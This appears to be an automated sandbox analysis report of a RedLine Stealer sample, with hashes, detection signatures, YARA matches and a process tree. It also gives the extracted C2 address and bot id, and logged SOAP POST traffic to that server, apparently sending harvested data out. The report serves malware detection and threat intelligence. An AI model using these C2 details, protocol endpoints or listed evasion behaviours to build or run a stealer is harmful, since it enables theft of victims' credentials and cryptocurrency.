Edit tour

Windows Analysis Report
b3u71vBG0u.exe

Overview

General Information

Sample name:	b3u71vBG0u.exe renamed because original name is a hash value
Original sample name:	464709f3215d06f6703eb4ecb607ae7a.exe
Analysis ID:	1464015
MD5:	464709f3215d06f6703eb4ecb607ae7a
SHA1:	1f438f2ab699f842cec119981ae5bf799df5d203
SHA256:	a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36
Tags:	32exeRedLineStealertrojan
Infos:

Detection

RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected RedLine Stealer

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses known network protocols on non-standard ports

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

b3u71vBG0u.exe (PID: 6292 cmdline: "C:\Users\user\Desktop\b3u71vBG0u.exe" MD5: 464709F3215D06F6703EB4ECB607AE7A)

RegSvcs.exe (PID: 1928 cmdline: "C:\Users\user\Desktop\b3u71vBG0u.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

conhost.exe (PID: 7180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.38.142.10:7474"], "Bot Id": "wordfile"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ee:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cf:$v2_6: GetUpdates
00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
Process Memory Space: b3u71vBG0u.exe PID: 6292	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: b3u71vBG0u.exe PID: 6292	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: b3u71vBG0u.exe PID: 6292	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x1a3033:$a4: get_ScannedWallets 0x1a1eda:$a5: get_ScanTelegram 0x1a2cbc:$a6: get_ScanGeckoBrowsersPaths 0x1a0b6d:$a7: <Processes>k__BackingField 0x19e0a0:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1a04a1:$a9: <ScanFTP>k__BackingField
Process Memory Space: RegSvcs.exe PID: 1928	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 1928	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 1928	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x62b19e:$a4: get_ScannedWallets 0x62a045:$a5: get_ScanTelegram 0x62ae27:$a6: get_ScanGeckoBrowsersPaths 0x628cd8:$a7: <Processes>k__BackingField 0x62620b:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x62860c:$a9: <ScanFTP>k__BackingField
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.b3u71vBG0u.exe.23a0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.b3u71vBG0u.exe.23a0000.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.b3u71vBG0u.exe.23a0000.1.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
0.2.b3u71vBG0u.exe.23a0000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ee:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cf:$v2_6: GetUpdates
0.2.b3u71vBG0u.exe.23a0000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.b3u71vBG0u.exe.23a0000.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.b3u71vBG0u.exe.23a0000.1.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
0.2.b3u71vBG0u.exe.23a0000.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ee:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cf:$v2_6: GetUpdates
1.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
1.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ee:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cf:$v2_6: GetUpdates
Click to see the 7 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 1.2.RegSvcs.exe.400000.0.unpack

Malware Configuration Extractor: RedLine {"C2 url": ["185.38.142.10:7474"], "Bot Id": "wordfile"}

Multi AV Scanner detection for domain / URL

Source: http://185.38.142.10:7474	Virustotal: Detection: 11%	Perma Link
Source: http://185.38.142.10:7474/	Virustotal: Detection: 11%	Perma Link
Source: 185.38.142.10:7474	Virustotal: Detection: 11%	Perma Link

Multi AV Scanner detection for submitted file

Source: b3u71vBG0u.exe	Virustotal: Detection: 63%			Perma Link
Source: b3u71vBG0u.exe	ReversingLabs: Detection: 60%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: b3u71vBG0u.exe

Joe Sandbox ML: detected

Source: b3u71vBG0u.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: wntdll.pdbUGP source: b3u71vBG0u.exe, 00000000.00000003.1692282169.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, b3u71vBG0u.exe, 00000000.00000003.1691094540.0000000004030000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: b3u71vBG0u.exe, 00000000.00000003.1692282169.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, b3u71vBG0u.exe, 00000000.00000003.1691094540.0000000004030000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007A4696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_007A4696
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007AC93C FindFirstFileW,FindClose,	0_2_007AC93C
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007AC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_007AC9C7
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007AF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_007AF200
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007AF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_007AF35D
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007AF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_007AF65E
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007A3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_007A3A2B
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007A3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_007A3D4E
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007ABF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_007ABF27

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 185.38.142.10:7474

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 7474
Source: unknown	Network traffic detected: HTTP traffic on port 7474 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 7474 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 7474
Source: unknown	Network traffic detected: HTTP traffic on port 7474 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 7474 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 7474
Source: unknown	Network traffic detected: HTTP traffic on port 7474 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 7474 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 7474
Source: unknown	Network traffic detected: HTTP traffic on port 7474 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 7474 -> 49734

Source: global traffic

TCP traffic: 192.168.2.4:49731 -> 185.38.142.10:7474

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.38.142.10:7474Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.38.142.10:7474Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.38.142.10:7474Content-Length: 987505Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.38.142.10:7474Content-Length: 987497Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: Joe Sandbox View

ASN Name: NETSOLUTIONSNL NETSOLUTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10
Source: unknown	TCP traffic detected without corresponding DNS query: 185.38.142.10

Source: C:\Users\user\Desktop\b3u71vBG0u.exe

Code function: 0_2_007B25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_007B25E2

Source: global traffic

DNS traffic detected: DNS query: api.ip.sb

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.38.142.10:7474Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1833328417.0000000002C85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.38.142.10:7474
Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.38.142.10:7474/
Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002C85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002BBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002BBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002C85000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1833328417.0000000002BBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002C85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegSvcs.exe, 00000001.00000002.1833328417.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb
Source: b3u71vBG0u.exe, 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: b3u71vBG0u.exe, 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
